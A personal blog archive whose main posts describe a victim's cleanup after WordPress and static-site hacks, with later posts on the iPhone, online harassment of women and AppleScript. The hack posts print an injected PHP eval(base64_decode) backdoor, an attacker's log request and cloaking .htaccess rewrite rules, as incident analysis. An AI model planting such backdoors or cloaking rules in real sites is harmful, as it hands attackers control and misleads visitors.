(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked! and Hacked, Again!)

I’ve done nearly all the design updates I’m going to do to the blog for now although I have a plenty large To Do list left. Sadly it’s an almost entirely different To Do list than I had before this mess happened.

This is my technical followup to what happened; you can skip it if you don’t care about the details. It is long (of course). I’ll get back to talking about chickens and food soon enough.

We ended yesterday with a complete reinstall of all the files on all my web sites, including a brand new version of WordPress and a new database for this blog. In retrospect, this is what I should have done straight off on monday. The #1 thing I have learned from this is when in doubt, assume it is WordPress and nuke it from space.

Notes on WordPress Security

I’m 99% sure that my hacker got into WordPress via a script called timthumb. This is a known WordPress vector for abuse — tons of themes and plugins use this script. In my case it was my theme, Thesis, that used it. This timthumb page has a lot of technical detail about why it is a problem, although the phrase “allowing hackers to upload and execute arbitrary PHP code” generally says it all.

There is a WordPress plugin called Timthumb Vulnerability Scanner that will check your entire WordPress installation for old versions of timthumb and made sure you are not subject to this hack. Note that I was using a current version of a respected paid theme and the most recent version of WordPress and the timthumb vulnerability was still there.

I also use the wp-security plugin for general WordPress security, which encourages you to make some of the more obvious changes to wordpress to keep hackers out (removing the admin account, renaming your database tables, etc.). I admit I had not implemented everything that wp-security recommended, because I was lazy. But even if I had it would not have helped with the timthumb hack.

The makers of wp-security have a web site called Website Defender that does much more in-depth security testing of your installation. I hadn’t gotten around to signing up for or installing the Website Defender tools (it requires some PHP to be placed on your web site, which, frankly, worried me right there). But a few people on twitter recommended it, so once I got my new software installed I set it up, and it looks MUCH more comprehensive for protecting WordPress. I kind of consider it anti-virus software for WordPress. They can keep track of new vulnerabilities so I don’t have to.

Lurking Horror in Non-Static Static HTML

I had been worried yesterday that my hacker was somehow able to modify files in my static HTML sites (my www.lauralemay.com and work.lauralemay.com sites) from the hacked WordPress blog site. This led me to believe that I actually had a worse hacker than just a web-based script-kiddie. It turns out I was wrong. PHP was the problem, and I had PHP everywhere that I just didn’t know about or wasn’t paying attention to. This was my fault for not being more diligent.

In the case of my www site, I once ran Movable Type there, and although I had turned off the itself software years ago I still had the files sitting around in the directory and accessible from the web. Tons of PHP floating around in there. This was dumb of me to keep around — especially since it was a very old version of Movable Type.

I was sure that my work site was safe — I wrote all that myself, in plain HTML and CSS. And then buried deep in a sub-sub-sub directory I found one PHP file that Dreamweaver of all things had written as part of “design notes” for the site. I know there was one time I used DreamWeaver for the site but it was years ago and I thought I had long since deleted all those extra notes directories. ONE FILE I didn’t even know was there, but the hacker scripts found it, and that was all it took. (Fortunately all I had to do was trash that one file and that was the end of it.)

I See You

While I was sitting around waiting for stuff to install and reimport and whatnot I got to thinking that maybe there were traces of my hacker in my access and error logs. Fortunately this is not a high-traffic web site (hah), so I could grep out typical requests and page through the rest of my logs without having to look at a zillion lines. A whole lot of lines like this one immediately stood out:

46.37.184.254 - - [04/Jan/2012:03:10:38 -0800] "GET /wp-admin/includes/schema.php?
img_id=1f3870be274f6c49b3e31a0c6728957f&mod_content=ZWNobyAiZ29vZ2xlZWVlIjs=
HTTP/1.0" 301 572 "http://facebook.com/" "Mozilla/4.0 (compatible; MSIE 8.0;
Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR
3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; .NET4.0C)"

I know of no legitimate reason for anyone to request anything inside wp-admin unless they are actually administering the site. There’s especially no reason to request schema.php, and no reason at all to give it arguments (img_id and mod_content). I had a copy of my hacked site on my local machine, and I took a look at schema.php. Bingo. Right at the top of the file, above the comments:

<?php if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434")
&& isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST
["mod_content"])); exit(); } ?>

eval(base64_decode you say? I don’t think so. I searched my entire blog site, and found about ten PHP files all over the place that had these lines scribbled at the start. Then I looked through my log files and there was my hacker, always at the same IP address, always pinging those same hacked files.

None of this actually really mattered, since I had trashed all the hacked filed when I reinstalled WordPress. But one of the first things I did when my new site was set up was to block that IP address. And today as I watch my logs roll by I am pleased to see client denied by server configuration coming up again and again.

Feeeelings

I’m not feeling the least bit confident about web software right now, and thinking about the security problems of complex web applications in general is making me break out in hives. It seems that the more complex a web app is the more likely it is that someone out there is going to fuck with it, and I just don’t have the time for that. I went to shared hosting precisely because I was tired of being my own sys admin. I can do it, but I’m not all that good at it, and I don’t want to. I want to write.

On the other hand, the idea of giving up all the administration and putting all my stuff in the cloud also doesn’t give me happy warm fuzzies. Because of course in that situation the cloudmasters are hadooping away on everything I do and generating all sorts of valuable advertising thneeds.

Either way it seems I’m eventually going to be pwned by someone.

grumble.

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked, Again! and Hacked, the Followup)

So, I had a fun afternoon, how about you?

A week or so ago, I noticed an odd thing: Google Reader had stopped updating my blog feeds. Around that time I had been mucking with the blog feeds (see Housekeeping) so I figured maybe I had confused Google Reader, and if I ignored it, maybe it would go away.

Hint: if Google gets annoyed at your web site, perhaps there is something wrong with your web site.

Then yesterday I noticed that if I unsubscribed to my blog feed in Google Reader and resubscribed to it, the title to my blog would not come up. Instead Google Reader decided the title was “Personal Creations Elmo, Consumer Payday Loans – $300 – $2500.”

I became indignant. My blog looked fine to me. It looked fine from a variety of other locations. The code looked fine if I grabbed it with curl. Something was wrong with Google.

Hint: It’s unlikely something is wrong with Google. Something might be wrong with your site.

Then it got worse and it spread to my search results:

At the same time a friend sent me a screen shot of my web site as he saw it:

Yeah, I got hacked. But it was a selective hack; only the google and yahoo crawlers and referers from google and yahoo saw it. (no one actually uses the Yahoo search engine.)

I spent the day cleaning up from this hack, including doing it twice because it came back. I still don’t know where it came from or if its going to come back again. This was not a lot of fun.

I googled what I found and turned almost no information at all; no exploits, no descriptions, no patches, nothing. I don’t know if what I had was new, or if it was obscure, or what. Technical details in the More part of this post.The changes I found affected three sites on my web host: one wordpress site (this blog) and, more worrisome, my www and work sites, which are entirely static HTML files — no PHP, no databases, just flat HTML.

On all three sites the hack added or modified an .htaccess file, adding rewrite rules. The modification dates of the files were not recent; they seemed to have picked a date and time that would not stand out (eg if every other file in the directory was modified on April 23, 2010, that was the modified date the .htaccess had). It also added a PHP file to the top level of the domain. For wordpress, that file was wp-stat.php (NOT wp-stats.php); for the static sites it was common.php. The rewrite rules in htaccess were similar for both versions:

# WordPress search queries statistic module

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
RewriteCond %{REQUEST_FILENAME} !wp-stat.php
RewriteCond %{DOCUMENT_ROOT}/wp-stat.php -f
RewriteRule ^.*$    /wp-stat.php [L]

The wp-stat file is a base64 encoded PHP file. (hint: random files with base 64 encoding are probably up to no good). I ran it through a base 64 decoder and got a self-decrypting JavaScript file (hint: ditto). There were only a few readable strings in that file, most obviously the string “VASH NE PODDERZHIVAET ETO.” Googling that turned up only two references. This is one. That is the same script.

I deleted the file and fixed my .htaccess files. Because this hack crossed all the boundaries of my web sites and because the modification dates were in the past, I suspected a worse break-in than just a wordpress hack. I changed every password on everything — my shell account, my mySQL database account, all my wordpress accounts.

While I was poking around looking for other suspicious things that might be going on, the hack put itself back: it remodified all my .htaccess files and reinstalled the wp-stats and common.php files. Dammit.

Finally, suspicious of wordpress altogether, I also blew away my database, went back to an earlier backup, and reconstructed the more recent posts via wordpress import/export.

I removed write access to the .htaccess files (chmod 0444) and either that, blowing away the wordpress database, or changing all my passwords), seems to have stopped it for now — at least it hasn’t come back in the last few hours. We’ll see what happens overnight.

If anyone has any other ideas I’d love to hear them.

Google Reader seems to have rediscovered my feeds. Google search is still a bit behind.

I have no information on consumer payday loans.

Update: Damn, this is a popular post. I am replying to comments below but I should note that I am not an iPhone expert. I have no special knowledge. I’m watching the news and the videos and reading the blogs like everyone else is. If you’re here looking for iPhone information consider the page on the iPhone on wikipedia which has collected a lot of what is currently known about it. Keep in mind also that there’s a whole lot that ISN’T known and won’t be known until the iPhone is released on friday and people actually take it apart and play with it.

Please note also that if you spam my blog with iPhone questions you’ve asked on every other blog that mentions the iPhone I will delete you. That’s really rude.

I’ve been asked a lot over the last week if I am going to be buying an iPhone, and twice if I’m going to be camping out to buy an iPhone. For some reason, I can’t imagine why, she said, innocently, I seem to have acquired the reputation for being kind of a cell phone freak.

I am not going to buy an iPhone, at least not this version. I am not an iPhone Hater, as those who lust for the iPhone are caling the doubters, but I personally feel little iPhone lust. My reasons:

• The virtual keyboard. I’m a heavy smartphone keyboard user; I am a double-thumb typer and I rely on the feel of the keys to type fast and accurately. The word on street so far is that the iPhone’s virtual keyboard takes some getting used to but is not as bad as it looks, especially if you trust the error correction to work for you. I would like to see it for myself, and I would like real people to use it for a while and to express real world opinions (can the blackberry people use it? That’s what I want to know). I’m also suspicious that any virtual keyboard will ever be as comfortable to type on as a real keyboard with pressable keys. I have a hell of a time with real full size keyboards that do not have good tactile feedback — the joints in my hands hurt. Given how often I type and my experiences over the years with stress injuries in my hands this is something I pay attention to. I do not want a phone that will land me in physical therapy, no matter how cool it is.
• The slow data connection. I was stunned when I heard in the original iPhone announcement that they were going with an EDGE cell connection. AT&T has a fast HSDPA 3G network in most major markets — I cannot comprehend why they didn’t use it. Apple seems to be blithely assuming that you can drop down to wifi at any time and then the connection will be speedy but as someone who has had a wifi phone for the last year I can assure future iPhone users that free and open wifi connections are not as ubiquitous as you might think, even in major urban areas. You will have to rely on EDGE, and EDGE is slow. I have EDGE with T-mobile and it is acceptable if you’re patient, but you have to be very patient. If you’re used to broadband or an EVDO connection it is going to drive you nuts.
• I hate AT&T. OK, I hate all cell carriers. They are all evil. AT&T is perhaps more grossly incompetent and money-grubbing than sheer evil, but AT&T is still a big vote for iPhone: NO right there. It’s going to take an awful lot to get me to sign up with AT&T, especially with a two-year contract, although now that they’ve announced the iPhone plans and they are remarkably simple and not stupidly named (you have the “Elbows Landscape plan with My Hazelnuts”) I’m a bit less suspicious. To be fair, I would probably have precisely this same argument with any carrier at all, including T-Mobile where I am now.
• $500+ for a phone no one has even seen. Speaking as someone who spent $500 on a phone last year that I hadn’t even seen this may seem like an odd complaint. I spent full retail on an unlocked, untethered phone, and I would do it again. I didn’t spend $500 on a phone that would also lock me into a $2000 long term contract with a carrier whose service I know isn’t all that great.
• It is a first generation Apple device. I have had on-and-off experiences with first generation Apple devices; My first generation PowerPC mac was a complete mess; my first generation iPod was replaced once under warranty and broke again a few months later; my first generation 12″ powerbook was rock solid for its entire useful life and I loved it so much I bought another one. The iPhone is new enough in a variety of ways — and cell phones are integral enough to my life that I would really hurt if it broke — that I think I’ll sit out the first generation.
• It’s just not that huge a revolution right now. It is an absolutely beautiful phone. The interface is gorgeous and there are obviously some really new ideas in interaction design there that are truly fascinating. Once the crowds in the stores die down I will be there in the Apple Store playing with it. I can definitely see buying one later on. But now? I have email and the web and Google Maps and text messaging on my phone. I have a camera and music. And I also have video and games and third-party applications. The interface isn’t as pretty on my Nokia. The screen is really small. The apps could be better designed and more useful. But its good for now.

I’ll wait.

In the meantime I do seem to have accidentally acquired a Nokia Internet Tablet. Its a wifi-based web browser and email device with a big high resolution screen that runs linux. I’m not exactly sure what came over me there.

And while I’m on the subject of documentation, here’s a great story from the former The Daily WTF.com, now known (sadly) as WorseThanFailure.com, called Very, Very Well Documented.

George’s contact at the Air Force was a gruff, old general with a vast knowledge of aerial warfare and forty years experience in the service. Naturally, he was very skeptical of the new guys’ ability to develop a ‘military grade’ product.’ After all, they hadn’t spent a single day in uniform. But George’s team quickly won him with a demonstration: one month after being awarded the contract, they had fully replicated the prototype plane’s specifications in their software. [..]

‘Gentlemen,’ the general started during one of their wrap-up meetings, ‘you have done very well. I am very impressed. There is, however, one problem. You did not provide nearly enough documentation.’ [...]

‘You see gentlemen,’ the general continued, ‘for such expensive program, we require at least eight meters of documentation.’ He stretched his arms as far as he could to illustrate. Clearly, he was not joking.

(read the rest of the story)

(I got it from The Daily WTF.)

A long time ago here I posted about the manual for the MN-156 Reciprocating Emu Press, which was mysteriously stored on Amazon’s media servers. I ended that post wondering what the real story was behind this amusing parady of a user manual.

A while ago mad_eponine, the author of the Reciprocating Emu Press manual, sent me email pointing me to this livejournal post with the real story, including how it ended up at Amazon. It is brilliant. I am happy to have played a small role in the saga.

The iPhone, a User’s Guide (McSweeney’s)

I . Introduction
II. Turning on the iPhone
III. Making a call using the iPhone
…
XI. Using the iPhone to explain how the internal board committee of Apple Computer Inc. (before the name change) headed by Al Gore could exonerate Steve Jobs of any wrongdoing in the options-backdating scandal
…
XVII. Using the iPhone to assist Nicole Kidman in playing a frankly commercial Mrs. Coulter in the new adaptation of The Golden Compass without losing the anti-Miltonian vibe or the stuff about the Magisterium
…
XIX. Using the iPhone to learn whether Ehud Barak ever considered adopting Barack Obama and changing the Illinois junior senator’s name to Barack Barak

I’m coming in late to comment on the Kathy Sierra situation. The wail of shock and anguish that passed over the internet about it has started to subside, and there’s already been a whole lot (a WHOLE lot) said on the topic.

If you missed it, here’s the story: Kathy Sierra, co-creator of the Head First line of computer books and one of my favourite writers, has been receiving death threats and harassment on her blog and elsewhere on the net. Because of it she cancelled her keynote and tutorials at Etech and was considering giving up blogging altogether. She talked about it on her blog in a post titled Death threats against bloggers are NOT “protected speech” — warning, there are some disturbing words and images here, and there are over 1000 comments so its very long to load.

This, in turn, is a very long post and not what I usually write about on this blog, so see more after the jump. (feed readers and livejournallers, you probably know by now that you get the whole thing and there is no “jump”).

I’ve been trying to figure out what to write about this, if anything. When Kathy first posted this story I got so mad I had to go take a walk to calm down. For a while I had a hard time thinking about anything other than this; I obsessively followed the posts about it; I had a hard time sleeping. I got all militant and composed a lot of unfinished posts in ALL CAPS about how we needed to STAND UP and FIX THE NET to because this kind of behavior is NOT ACCEPTABLE.

Now two days later, now that all my anger has worn off, I feel kind of tired and sad and depressed and hopeless. Fix the net, right, ha ha, sorry, never mind.

Mostly as I read the comments on Kathy’s post and on other blogs I have noticed a kind of interesting but obvious breakdown. Men, in general, are shocked and horrified that this kind of harassment goes on at all. Women are of course shocked and horrified at Kathy’s situation, but they also kind of nod ruefully and say yeah, it happened to me, too.

I honestly didn’t think this was a secret, that women get disproportionally picked on in the internets. I thought it was a big fat obvious fact.

Do I get stalked and harassed and picked on on the internet? Do I get death threats? Sure. I started getting them the week I first posted to Usenet twenty years ago, and I’ve been getting them ever since. It was worse during the usenet era, and WAY worse when I was selling a lot of books. Its pretty quiet these days now that I’m mostly anonymous and I write a mostly personal journal blog. No one cares about cat posts; there are bigger targets. But it still happens.

Most of it is just casual drive-by stupid misppelled email and blog comments of the “you dumb slut you should die” variety. Occasionally it gets creepy, sexually explicit, detailed, and ugly. Occasionally it really hits a nerve. I’ve been fortunate that I’ve never been stalked outside of email, or targeted for photoshopping the way Kathy was. Somehow it seems much closer to home, much more scary and real, when they start tampering with your image.

But even though all I’ve had is silly email and blog comments I would be lying if I said I was immune to it, that I just blithely delete it all and move on with my life, or that the barrage of it when I was a popular author wasn’t a factor in wanting to maybe not be so popular anymore. You always wonder if its THIS particular scary nutbag who’s going to be the one to go beyond recreational typing. There’s always a small nagging fear.

Honestly until this week I thought this sort of constant harassment was so common and so obvious it wasn’t even worth mentioning. It had gone on for so long and I had gotten so used to it that it hadn’t occurred to me that this is anything other than what it means to be female on the internet. I told Eric about it and he asked me, aghast, why I had never mentioned that I get death threats. We’ve known each other for fifteen years. It just never came up. The shocked reactions internet-wide to Kathy’s post have made me realize that hm. maybe this isn’t normal. And maybe it shouldn’t be.

On the other hand, as I read other reactions to Kathy’s post on blogs, in comments, across the web, it seemed like some other people picked up the militant FIX THE WEB meme and were talking about how we needed LAWS to prevent this kind of thing, that people shouldn’t be ALLOWED to post just ANYTHING on the net and that there should be some way to TRACK people’s identity to keep them from being mean on the net.

Well, that’s not what I was thinking of when I was angry. We can’t control identity on the Internet without also creating a police state in real life. Duh. And just forcing identity does not prevent meanness — on the Well, the old-skool walled-garden BBS where I’ve been a member for a thousand years, anonymity is banned, and there are still plenty of assholes willing to step up and be mean. Plus anonymity is not necessarily the problem; you can have an online identity that is effectively anonymous and still have a consistent, reasonable, intelligent, not insane rapist serial killer online presence.

On the other hand, I do believe that easy anonymity does have a tendency to breed bad manners. I’ve seen it happen over and over again on BBSes, usenet, IRC, forums, blogs, Amazon comments. Couple easy anonymity with a community that doesn’t have any social norms for telling the assholes to stop being assholes and you get a sort of acceptance of bad behavior (take, for example, the slashdot or digg forums, which are notorious for being hostile to women. That is the culture there, its accepted, it is normal, so it goes on). When you get a community where the stated GOAL is to be snarky and insulting, as was apparently the case on the “meankids” site — then how can anyone be remotely surprised when the tone turns ugly. It is a classic example of mob mentality.

Chris Locke, RageBoy, who was apparently related in some way to the sites where Kathy was harrassed (given the confusion around the facts I really hesitate to make any claims stronger than that), ironically brought up the Well in his defense of the sites in question. He talked about “You Own Your Own Words” being the core ethos of the Well and how he had taken that to be a guiding principle. He interprets it as “I will not take responsibility for what someone else said, nor will I censor what another individual wrote.” But there’s two problems with that statement. The first is that YOYOW doesn’t mean you disclaim or censor anyone else’s writing. It means literally what it says — you have copyright ownership over your own words. No one else can take them, use them or post them anywhere outside the Well without your permission. The other problem is that YOYOW is only one of the well’s core ethos…es (ethosii?). The other one is that no one is anonymous, so you MUST take ownership of your words. The O in YOYOW has meaning. Your real name it attatched to every single post. Which brings us full circle to the notion of identity on the internet, and standing up for what you say.

I don’t have a magic beans, golden ticket solution to solving any of these problems. The dark cynic in me believes that after everyone’s militant anger over Kathy’s post wears off some other bright shiny thing will come along for the blogger crowd and nothing will ever happen and we’ll all be back to angry email and ugly photoshop and frightening women away from participating in the net in no time flat.

But then I do think, what if more of us do speak up the way Kathy did. Stop deleting the comments. Start posting the email. Start telling the assholes in forums and blog comments that they are being assholes, rather than just shrugging or ignoring or clicking through or (gasp) removing that person’s blog feed from our news reader (gasp). We have a zillion ways in real life of registering disapproval when someone says something idiotic, from frowning to turning away to actually saying “boy, that was dumb.” There’s not a lot like that online. Maybe in addition to just “digg down” or “-1″ we should stand up and speak up more often. Maybe through social engineering, not just web engineering, we can create a better community and a better culture online.

Optimism wins out over sad and tired after all. I’ll probably get death threats for suggesting it.

Last night I plugged in a new hard disk drive to store my increasingly large collection of stuff. I’ve done this a bunch of times before, its not hard. But then when I opened up Disk Utility to format the drive something seemed…kind of strange.

892.6 … PB? PB? That can’t mean…petabytes?

I looked down the screen to total capacity.

Holy crap! Thats a lot of bytes. I had to go tell Eric.

Laura: what does it mean when you plug in a disk and it says you have 900 petabytes of free space?
Eric: either the math is wrong or you’ve just opened up a worm hole in space.

Geeky explanation: It turns out that Maxtor drives do not jumper like the Quantum drives I’ve been using. I reset the jumper correctly and I got the normal .00025 PB capacity I was looking for.

Other
Long-Standing Feuds I’d Like to See Explored in a Commercial à la
“Hi, I’m a Mac” … “And I’m a PC.”, by Jesse Benjamin, from McSweeney’s

…
“Hi, I’m the Internet.” “And I’m Doing Something Productive With My Free Time.”
…

Thanks to Kottke, here’s the link to turn off those insanely annoying Snap previews that are showing up on far too many web sites. This link sets a cookie that will turn them off for all sites, forever. Forever. Gone. Thank you.

I’d like to send a really big box of crap to every web site owner who thinks installing this pustulant visual intrusion is a good idea. Stop it. Just stop.

(I got it from Kottke.)

My ISP has been tuning the antennas this afternoon, and things have been… kind of zippy. I ran a speed test and just had to put up this screen shot.

How fast is my broadband? It is beyond dude fast.

(this was, alas, short-lived. They finished tuning the antennas and things dropped back down to merely fast fast. Still. It was breathtaking for a while there. Have I mentioned recently how much I like high speed wireless?).

I really want to like AppleScript. It’s a weird programming language, and I like weird programming languages, ergo, I should like AppleScript. In theory, there’s a ton of stuff you CAN do with applescript to do automated stuff on the mac.

But it seems like every time I delve into Applescript I rapidly descend into complete madness, ending up hours later phrasing and rephrasing the same line trying to get it to do something trivially simple in any other language and screaming at the computer in fury. It is not a language for humans to program in. It is a gross deceptive horror of a language. It makes no sense. You read AppleScript and you think, OK, it’s like english, and you try to write it and no, its not like english at all. It is a happy fluffy pink bunny hiding a jar of acid behind its back. I hate this *@&#(@&*# language.

I got to thinking about AppleScript today because over on Daring Fireball John Gruber has a long post about deep problems he’s been having with AppleScript, with a digression in the middle about the horrors of AppleScript in general. It’s a post that made me grimace in pain and sympathy, and wonder throughout “oh no. no it can’t be that bad.” but yes. It was. His bug is, fortunately, not a bug I have run into. I have not done that much with AppleScript, and frankly, I would have given up way before he did. But it is a bug that makes me throw up my hands in disgust at the sheer….inelegance of it all.

It is really shameful that Apple, which does so well in its consumer-facing hardware and software visual and industrial design, has such an ugly, nasty, slimy, drooling troll of a language design for its underlying automation. That’s just WRONG. And its wrong that Apple has gone so long — what, fifteen years?! without fixing it. It’s like an old rotten blankie they just can’t stop worrying. Just throw out the damn language, Apple. Just start over with something that works.

It is good that Tiger has Automator, to help user automation, so now normal humans don’t have to deal with AppleScript. That’s a start. But I’m surprised as I poke around that if you want to program Automator, to do more than just click the buttons, you have two choices: AppleScript (arrrggghhh) and Objective C. The nasty unlearnable scripting language and the heavyweight scary Real Programming Language. Not the most approachable framework.

On the other hand Dashboard uses JavaScript as its scripting language. Someone in that group didn’t drink the koolaid, I guess. JavaScript isn’t exactly the most perfect programming language, but at least it makes some marginal amount of logical sense.

OSX does have the Open Scripting Architecture, OSA, which theoretically enables other scripting languages to be plugged in and used instead of AppleScript for basic automation. I haven’t heard much about this other than that there are plug-ins for JavaScript and Python. I get the impression that its not commonly used. I should add that to my list of Stuff to Play With (only about 40 items long now….)

The Unofficial Apple Weblog (TUAW) posts that Apple Technote #31, describing Clarus, the Dogcow, seems to have gone missing on the Apple Developer Website. The dogcow is a bit of apple lore that turned up again and again in various places in Apple software over the years. Removing technote 31 does not bode well for the corporatization of Apple. Fortunately, as someone in the TUAW comments pointed out, you can still find technote 31 at web.archive.org. I note that wikipedia has a big page about the dogcow as well (although it is sadly quite factual and dry).

I’m remembering a dust-up a long time ago when I was at Stupid Company when an unknown writer edited out a line from the tunefs(8) man page that said “You can tune a file system, but you can’t tune a fish.” Presumably it was removed because it was funny. Can’t have that. But back then greater minds prevailed and it was put back with great fanfare and a big comment added to the source that said this joke was a Unix tradition and should not be removed.

Alas I just checked the tunefs man page from a recent Stupid Company OS release and it’s gone again. Wah.

(I got it from inessential.com.)

(click through, the whole thing is cute).

A bunch of months ago we got wireless broadband Internet, and all was right with the world. Except there seems to be a rule in our world that once something goes right in our tech configuration, something must also then go horribly wrong. So after changing ISPs, getting a new mini-firewall, renumbering our entire internal network, moving our DNS offsite, reprogramming our entire spam management system, and finally getting everything working perfectly, the very next day the power supply in our main server blew up (“what do you mean it won’t turn on?” “you heard me, it won’t turn on and it smells bad.”)

While the easy solution would have been to just go find a power supply, we considered all options. Usually the death of a box is what forces us to upgrade; this box was purchased when our last server blew up a few years ago (hard drive Grind of Death). It was a decent box for its time but nothing top of the line, and it was showing its age. I began shopping for a new computer. Something in the $500 Dell range, I figured.

It was then that Fry’s began to advertise the Dirt Cheap Computer. Fry’s, as anyone from the area knows, is the local evil computer superstore. You can get anything — *anything* computer or technology related at Fry’s, and at really incredible prices. You just have to completely humiliate yourself to do it. No sales people at Fry’s know anything about the technology they sell, but they harrass you madly for the comission; they browbeat you to sell you things you don’t need; they line you up like cattle to pay for stuff and shout at you (“Line 14! Line 14!”) and then they search you at the door on your way out. And that’s just to buy things. Just try to return something (shudder). Fry’s is really evil, everyone hates them, but yet its hard not to keep going back. If you really need a null modem cable at 10PM on a sunday, they will have it. Its right next to the porn and the diet coke.

The Dirt Cheap Computer (DCC) is actually technically called the Great Quality computer. You may snicker derisively; we did. It is not Great Quality. It has off-brand parts in a no-name case. It runs linux (linspire, actually). And it costs $180. No rebate interpretive dance needed; that is the price. (you can get a slightly higher quality version, with Windows, for $250).

At the time we found out about the dirt cheap computer, it was on sale. For $150. We figured: if it blows up in a year we will just buy another one. $150. Its practically free. Yeehaw.

The DCC, it turns out, is terrific. Fedora Core installs on it with zero issues. It comes with a minimal 128M of memory (thus the price) which was fine for basic routing and web and shell access and mail until we installed SpamAssassin and then it swapped itself into a puddle. Another 512M made it much happier. Its just a server machine, but now it gronks away happily in the corner with nary a peep.